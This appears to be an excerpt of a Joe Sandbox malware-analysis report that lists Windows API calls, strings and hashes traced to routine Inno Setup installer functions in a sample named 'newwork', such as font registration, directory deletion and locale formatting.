                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                        • String ID: %H
                                                                                        • API String ID: 3275473261-1959103961
                                                                                        • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                        • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                                        • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                        • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                                        APIs
                                                                                          • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                          • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                                                        • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                                                        • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                                                        • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                                                        • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                                                        Strings
                                                                                        • Deleting Uninstall data files., xrefs: 004964FB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                        • String ID: Deleting Uninstall data files.
                                                                                        • API String ID: 1570157960-2568741658
                                                                                        • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                        • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                                                        • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                        • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                                                        APIs
                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                        • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                                                        • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                                                        • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                                                        Strings
                                                                                        • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                                                        • AddFontResource, xrefs: 004702B5
                                                                                        • Failed to open Fonts registry key., xrefs: 00470281
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                        • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                        • API String ID: 955540645-649663873
                                                                                        • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                        • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                                                        • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                        • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                                                        APIs
                                                                                          • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                          • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                          • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                                                        • GetVersion.KERNEL32 ref: 00462E60
                                                                                        • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                                                        • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                                                        • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                                                        • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                        • String ID: Explorer
                                                                                        • API String ID: 2594429197-512347832
                                                                                        • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                        • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                                                        • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                        • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                                                        APIs
                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021A2BE0,?,?,?,021A2BE0,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021A2BE0,?,?,?,021A2BE0,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                        • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021A2BE0,?,?,?,021A2BE0), ref: 004783CC
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,021A2BE0,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                        • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                        • API String ID: 2704155762-2318956294
                                                                                        • Opcode ID: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                        • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                                                        • Opcode Fuzzy Hash: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                        • Instruction Fuzzy Hash: 370180A07C070536E520316A4C8AFBB654C8B50769F14863FBA1DFA2D3FDED9D06016E
                                                                                        APIs
                                                                                        • GetLastError.KERNEL32(00000000,00459F8E,?,00000000,00000000,00000000,?,00000006,?,00000000,0049785D,?,00000000,00497900), ref: 00459ED2
                                                                                          • Part of subcall function 004543F4: FindClose.KERNEL32(000000FF,004544EA), ref: 004544D9
                                                                                        Strings
                                                                                        • Failed to delete directory (%d). Will retry later., xrefs: 00459EEB
                                                                                        • Deleting directory: %s, xrefs: 00459E5B
                                                                                        • Failed to delete directory (%d)., xrefs: 00459F68
                                                                                        • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00459EAC
                                                                                        • Failed to strip read-only attribute., xrefs: 00459EA0
                                                                                        • Stripped read-only attribute., xrefs: 00459E94
                                                                                        • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00459F47
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseErrorFindLast
                                                                                        • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                                                        • API String ID: 754982922-1448842058
                                                                                        • Opcode ID: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                        • Instruction ID: b8d9b7298ea7c3337bda5d500217c07e27fbd6b384233f4239b27a523d6d10d0
                                                                                        • Opcode Fuzzy Hash: 9c44e2e7f6fe757755561f6ca8568e0fef47b87f075e017b2858cb20ebfba709
                                                                                        • Instruction Fuzzy Hash: 1841A331A04208CACB10EB69C8413AEB6A55F4530AF54897BAC01D73D3CB7C8E0DC75E
                                                                                        APIs
                                                                                        • GetCapture.USER32 ref: 00422EA4
                                                                                        • GetCapture.USER32 ref: 00422EB3
                                                                                        • SendMessageA.USER32(00000000,0000001F,00000000,00000000), ref: 00422EB9
                                                                                        • ReleaseCapture.USER32 ref: 00422EBE
                                                                                        • GetActiveWindow.USER32 ref: 00422ECD
                                                                                        • SendMessageA.USER32(00000000,0000B000,00000000,00000000), ref: 00422F4C
                                                                                        • SendMessageA.USER32(00000000,0000B001,00000000,00000000), ref: 00422FB0
                                                                                        • GetActiveWindow.USER32 ref: 00422FBF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: CaptureMessageSend$ActiveWindow$Release
                                                                                        • String ID:
                                                                                        • API String ID: 862346643-0
                                                                                        • Opcode ID: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                        • Instruction ID: c6261992695b47722d84ffa44129b55dc5b2a4dad2f70b0012283783c1c7b094
                                                                                        • Opcode Fuzzy Hash: b1a57ae8c862de22bc82aa702dd5f84040ee9f6a0804fcde46ad074f7f3e30fe
                                                                                        • Instruction Fuzzy Hash: 24417230B00245AFDB10EB69DA86B9E77F1EF44304F5540BAF404AB2A2D778AE40DB49
                                                                                        APIs
                                                                                        • GetWindowLongA.USER32(?,000000F0), ref: 0042F2BA
                                                                                        • GetWindowLongA.USER32(?,000000EC), ref: 0042F2D1
                                                                                        • GetActiveWindow.USER32 ref: 0042F2DA
                                                                                        • MessageBoxA.USER32(00000000,00000000,00000000,00000000), ref: 0042F307
                                                                                        • SetActiveWindow.USER32(?,0042F437,00000000,?), ref: 0042F328
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ActiveLong$Message
                                                                                        • String ID:
                                                                                        • API String ID: 2785966331-0
                                                                                        • Opcode ID: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                        • Instruction ID: ac844ef734d24c76dc9aa96f201b13a865b129e9c1b137beabd8cb6517960092
                                                                                        • Opcode Fuzzy Hash: 267c9eefe26e23fd4e765c6349420bb8bb9da3d18075eb1d96a464b655a4fe2f
                                                                                        • Instruction Fuzzy Hash: F931D271A00254AFEB01EFA5DD52E6EBBB8EB09304F9144BAF804E3291D73C9D10CB58
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0042948A
                                                                                        • GetTextMetricsA.GDI32(00000000), ref: 00429493
                                                                                          • Part of subcall function 0041A1E8: CreateFontIndirectA.GDI32(?), ref: 0041A2A7
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004294A2
                                                                                        • GetTextMetricsA.GDI32(00000000,?), ref: 004294AF
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 004294B6
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 004294BE
                                                                                        • GetSystemMetrics.USER32(00000006), ref: 004294E3
                                                                                        • GetSystemMetrics.USER32(00000006), ref: 004294FD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Metrics$ObjectSelectSystemText$CreateFontIndirectRelease
                                                                                        • String ID:
                                                                                        • API String ID: 1583807278-0
                                                                                        • Opcode ID: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                        • Instruction ID: 8a5b62ad3b2811282b00f4aa11bc4c2c065e9b9ae855548013837f5c18493421
                                                                                        • Opcode Fuzzy Hash: 960ca5b6b9ec06081429caf0e2ae16fd4423d047ce8cb1d090ce01a2b2c84894
                                                                                        • Instruction Fuzzy Hash: 0F01C4A17087103BE321767A9CC6F6F65C8DB44358F84043BF686D63D3D96C9C41866A
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 0041DE27
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041DE31
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0041DE3E
                                                                                        • MulDiv.KERNEL32(00000008,00000060,00000048), ref: 0041DE4D
                                                                                        • GetStockObject.GDI32(00000007), ref: 0041DE5B
                                                                                        • GetStockObject.GDI32(00000005), ref: 0041DE67
                                                                                        • GetStockObject.GDI32(0000000D), ref: 0041DE73
                                                                                        • LoadIconA.USER32(00000000,00007F00), ref: 0041DE84
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectStock$CapsDeviceIconLoadRelease
                                                                                        • String ID:
                                                                                        • API String ID: 225703358-0
                                                                                        • Opcode ID: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                                                        • Instruction ID: 282f56568f1177e4dad385ec7f61a974d29090d827cf1f87eb40c920fa9ca7e8
                                                                                        • Opcode Fuzzy Hash: 93123cf7b7da28845296a778695a34f9ae7968dfa7e72d2685fd09fde09bf652
                                                                                        • Instruction Fuzzy Hash: 4C1142706457015EE340BFA66E52B6A36A4D725708F40413FF609AF3D1D77A2C448B9E
                                                                                        APIs
                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 00463344
                                                                                        • SetCursor.USER32(00000000,00000000,00007F02,00000000,004633D9), ref: 0046334A
                                                                                        • SetCursor.USER32(?,004633C1,00007F02,00000000,004633D9), ref: 004633B4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: Cursor$Load
                                                                                        • String ID: $ $Internal error: Item already expanding
                                                                                        • API String ID: 1675784387-1948079669
                                                                                        • Opcode ID: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                        • Instruction ID: e4e85f4aa3fa623d7d3a169fbc538aa22306e9421cedfdc69a3031d12d347dae
                                                                                        • Opcode Fuzzy Hash: 040729a671edf880b94918ceea5f8eaec20fdfbf8da854279a56862745118dff
                                                                                        • Instruction Fuzzy Hash: 4CB18270604284EFDB11DF29C545B9ABBF1BF04305F1484AAE8469B792DB78EE44CB4A
                                                                                        APIs
                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00453E17
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: PrivateProfileStringWrite
                                                                                        • String ID: .tmp$MoveFileEx$NUL$WININIT.INI$[rename]
                                                                                        • API String ID: 390214022-3304407042
                                                                                        • Opcode ID: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                        • Instruction ID: 4c4b1d7f09994941c57eaafc4db68242d6a3f6c21ecd3f2b5b8f846a746055a2
                                                                                        • Opcode Fuzzy Hash: 262666494607197906d7283235c4c76affd32b2b0fdb9ef9cba9b9ea75353bac
                                                                                        • Instruction Fuzzy Hash: 40911434E002099BDB01EFA5D842BDEB7F5AF4874AF608466E90077392D7786E49CB58
                                                                                        APIs
                                                                                        • GetClassInfoW.USER32(00000000,COMBOBOX,?), ref: 00476CA9
                                                                                        • SetWindowLongW.USER32(00000000,000000FC,00476C04), ref: 00476CD0
                                                                                        • GetACP.KERNEL32(00000000,00476EE8,?,00000000,00476F12), ref: 00476D0D
                                                                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00476D53
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassInfoLongMessageSendWindow
                                                                                        • String ID: COMBOBOX$Inno Setup: Language
                                                                                        • API String ID: 3391662889-4234151509
                                                                                        • Opcode ID: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                        • Instruction ID: b13fa11fcbd9abdf7db93726dac51e4442bd67f198c8610d2c1064f44be53319
                                                                                        • Opcode Fuzzy Hash: 1db359e320ab2741222256d54ad499686456584f5ec697b8868a090b3fdd66eb
                                                                                        • Instruction Fuzzy Hash: 46812C346006059FDB10DF69D985AEAB7F2FB09304F15C1BAE808EB762D778AD41CB58
                                                                                        APIs
                                                                                        • GetSystemDefaultLCID.KERNEL32(00000000,00408968,?,?,?,?,00000000,00000000,00000000,?,0040996F,00000000,00409982), ref: 0040873A
                                                                                          • Part of subcall function 00408568: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,00408633,?,00000000,00408712), ref: 00408586
                                                                                          • Part of subcall function 004085B4: GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,004087B6,?,?,?,00000000,00408968), ref: 004085C7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                         • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                         • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                        Similarity
                                                                                        • API ID: InfoLocale$DefaultSystem
                                                                                        • String ID: AMPM$:mm$:mm:ss$m/d/yy$mmmm d, yyyy
                                                                                        • API String ID: 1044490935-665933166
                                                                                        • Opcode ID: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                        • Instruction ID: 5c6fde8006682913ecab3173e7335377554a92ac61a87523d81808753b4ec1a9
                                                                                        • Opcode Fuzzy Hash: 99a58aab46255149f4b24f4520dbd6929c7443738739b227c4cc8c7d24f61a81
                                                                                        • Instruction Fuzzy Hash: 7D516C24B00108ABDB01FBA69E4169EB7A9DB94308F50C07FA181BB3C3CE3DDA05975D
                                                                                        APIs
                                                                                        • GetVersion.KERNEL32(00000000,004118F9), ref: 0041178C
                                                                                        • InsertMenuItemA.USER32(?,000000FF,00000001,0000002C), ref: 0041184A
                                                                                          • Part of subcall function 00411AAC: CreatePopupMenu.USER32 ref: 00411AC6
                                                                                        • InsertMenuA.USER32(?,000000FF,?,?,00000000), ref: 004118D6
                                                                                          • Part of subcall function 00411AAC: CreateMenu.USER32 ref: 00411AD0
                                                                                        • InsertMenuA.USER32(?,000000FF,?,00000000,00000000), ref: 004118BD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.3555596978.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.3555538160.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555763218.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555828098.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555892790.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                        • Associated: 00000001.00000002.3555951387.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                        Joe Sandbox IDA Plugin
